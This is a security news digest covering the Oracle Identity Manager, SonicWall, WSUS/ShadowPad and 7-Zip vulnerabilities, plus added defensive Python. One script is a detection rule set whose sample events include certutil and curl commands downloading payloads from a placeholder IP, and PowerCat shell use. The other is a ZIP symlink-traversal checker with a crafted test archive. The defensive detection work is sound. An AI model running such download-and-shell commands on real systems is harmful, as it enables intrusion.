CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing authentication for a critical function that can result in pre-authenticated remote code execution. The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. It was addressed by Oracle as part of its quarterly updates released last month.
Source: The Hacker News | BleepingComputer | SecurityWeek | Dark Reading | SANS Internet Storm Center | Searchlight Cyber security research
Link: https://thehackernews.com/2025/11/cisa-warns-of-actively-exploited.html
Link: https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/
New SonicWall SonicOS flaw allows hackers to crash firewalls
American cybersecurity company SonicWall urged customers today to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls.
Tracked as CVE-2025-40601, this denial-of-service vulnerability is caused by a stack-based buffer overflow impacting Gen8 and Gen7 (hardware and virtual) firewalls.
“A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash,” SonicWall said.
“SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall.”
However, the company added that its Gen6 firewalls, as well as the SMA 1000 and SMA 100 series SSL VPN products, are not vulnerable to attacks potentially targeting this vulnerability.
Source: BleepingComputer | SecurityWeek | SonicWall PSIRT
Link: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016
ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access
A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad.
“The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.”
ShadowPad, assessed to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. It first emerged in 2015. In an analysis published in August 2021, SentinelOne called it a “masterpiece of privately sold malware in Chinese espionage.”
Source: The Hacker News | hawktrace
Link: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
Link: https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
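An added detection example for the chain described above (not code from the ASEC report or any vendor): simple process-creation rules for the three tools the report names, certutil, curl and PowerCat, correlated per host so that only a WSUS server showing more than one stage of the download-then-shell pattern raises an alert. The event layout and the sample events are constructed here.

```python
import re
from collections import defaultdict

# Constructed process-creation events in a simplified layout (an assumption, not any
# vendor's schema): host, whether the WSUS role is installed, image, full command line.
SAMPLE_EVENTS = [
    {"host": "wsus01", "wsus": True, "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File powercat.ps1"},
    {"host": "wsus01", "wsus": True, "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://203.0.113.10/s.dat C:\\Temp\\s.dat"},
    {"host": "wsus01", "wsus": True, "image": "curl.exe",
     "cmdline": "curl.exe -o C:\\Windows\\Temp\\l.dll http://203.0.113.10/l.dll"},
    {"host": "web02", "wsus": False, "image": "curl.exe",
     "cmdline": "curl.exe -s https://updates.example.com/health"},
    {"host": "admin01", "wsus": False, "image": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\tools\\setup.exe SHA256"},
]

RULES = {
    # certutil used as a downloader: -urlcache fetches a remote URL to disk
    "certutil_download": lambda e: e["image"].lower() == "certutil.exe"
    and "-urlcache" in e["cmdline"].lower(),
    # curl pulling content from a remote host
    "curl_download": lambda e: e["image"].lower() == "curl.exe"
    and bool(re.search(r"https?://", e["cmdline"], re.I)),
    # PowerCat, the PowerShell Netcat port, used to obtain a shell
    "powercat_shell": lambda e: "powercat" in e["cmdline"].lower(),
}


def match_rules(events):
    """Return a set of (host, rule_name) pairs for every event that trips a rule."""
    hits = set()
    for e in events:
        for name, pred in RULES.items():
            if pred(e):
                hits.add((e["host"], name))
    return hits


def wsus_chain_alerts(events, min_rules=2):
    """WSUS hosts where at least `min_rules` distinct rules fired (the chain, not a lone curl)."""
    wsus_hosts = {e["host"] for e in events if e["wsus"]}
    per_host = defaultdict(set)
    for host, rule in match_rules(events):
        per_host[host].add(rule)
    return {h: sorted(r) for h, r in per_host.items()
            if h in wsus_hosts and len(r) >= min_rules}
```

A lone curl or certutil call on a non-WSUS host only registers as a rule hit, which keeps the benign health check and the hash computation in the sample out of the alert set.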
3 SOC Challenges You Need to Solve Before 2026
2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns.
Source: The Hacker News
Link: https://thehackernews.com/2025/11/3-soc-challenges-you-need-to-solve.html
When Your $2M Security Detection Fails: Can your SOC Save You?
Enterprises today are expected to have at least 6-8 detection tools, as detection is considered a standard investment and the first line of defense. Yet security leaders struggle to justify dedicating resources further down the alert lifecycle to their superiors.
As a result, most organizations’ security investments are asymmetrical: robust detection tools paired with an under-resourced SOC, their last line of defense.
A recent case study demonstrates how companies with a standardized SOC prevented a sophisticated phishing attack that bypassed leading email security tools. In this case study, a cross-company phishing campaign targeted C-suite executives at multiple enterprises. Eight different email security tools across these organizations failed to detect the attack, and phishing emails reached executive inboxes. However, each organization’s SOC team detected the attack immediately after employees reported the suspicious emails.
Source: The Hacker News
Link: https://thehackernews.com/2025/11/when-your-2m-security-detection-fails.html
Recent 7-Zip Vulnerability Exploited in Attacks
Threat actors are exploiting a recently patched 7-Zip vulnerability that leads to remote code execution (RCE), NHS England warns.
The bug, tracked as CVE-2025-11001 (CVSS score of 7.0), is described as a file parsing directory traversal issue, and requires user interaction for successful exploitation.
The flaw impacts 7-Zip’s handling of symbolic links in ZIP files, as crafted data could be used to traverse to unintended directories during processing.
“An attacker can leverage this vulnerability to execute code in the context of a service account,” a Trend Micro Zero Day Initiative (ZDI) advisory reads. According to ZDI, attack vectors depend on implementation.
Ryota Shiga of GMO Flatt Security was credited for finding this security defect and an identical vulnerability tracked as CVE-2025-11002.
Source: SecurityWeek
Link: https://www.securityweek.com/recent-7-zip-vulnerability-exploited-in-attacks/
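A defender-side pre-extraction check for the symlink pattern the 7-Zip item describes, as an added example that is not taken from the advisory or from 7-Zip itself: it walks a ZIP's entries, identifies symbolic-link entries by the Unix mode bits in their external attributes, and flags any link whose target resolves outside the extraction root. The sample archive is constructed inline.

```python
import io
import posixpath
import stat
import zipfile


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    # The Unix mode (including the S_IFLNK file-type bits) is stored in the
    # high 16 bits of the ZIP entry's external attributes.
    return stat.S_ISLNK(info.external_attr >> 16)


def escapes_root(entry_name: str, target: str) -> bool:
    # Resolve the link target relative to the entry's own directory and check
    # whether the normalised path climbs above the extraction root.
    if posixpath.isabs(target) or target.startswith("\\") or ":" in target[:2]:
        return True
    resolved = posixpath.normpath(
        posixpath.join(posixpath.dirname(entry_name), target.replace("\\", "/")))
    return resolved == ".." or resolved.startswith("../")


def find_escaping_symlinks(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (entry name, link target) for each symlink whose target points
    outside the directory the archive would be extracted into."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_symlink_entry(info):
                target = zf.read(info).decode("utf-8", errors="replace")
                if escapes_root(info.filename, target):
                    findings.append((info.filename, target))
    return findings


def build_sample_archive() -> bytes:
    """Constructed test archive: a regular file, a symlink that stays inside
    the archive tree, and two symlinks whose targets would leave it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        links = [("docs/link_ok", "readme.txt"),
                 ("docs/link_up", "../../outside/target.txt"),
                 ("link_abs", "/abs/target")]
        for name, target in links:
            info = zipfile.ZipInfo(name)
            info.external_attr = (stat.S_IFLNK | 0o777) << 16  # mark as symlink
            zf.writestr(info, target)
    return buf.getvalue()
```

The check resolves each link target by one hop only; a link that points at another in-archive symlink which itself escapes needs chain resolution, and the extractor's own symlink handling (what the 7-Zip patch changes) is not modelled here.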
Four-Step Intelligence Model for Decision Making
The OODA loop is a four-step model used in intelligence for decision making that involves analyzing information and acting on it. In this article, I explain the roots of its history, its applications in combat operations, and how it can be utilized for time-sensitive decision-making processes in cybersecurity, as well as in other areas of our lives.
Source: Secjuice
Link: https://www.secjuice.com/time-sensitive-decision-making-with-the-ooda-loop-model/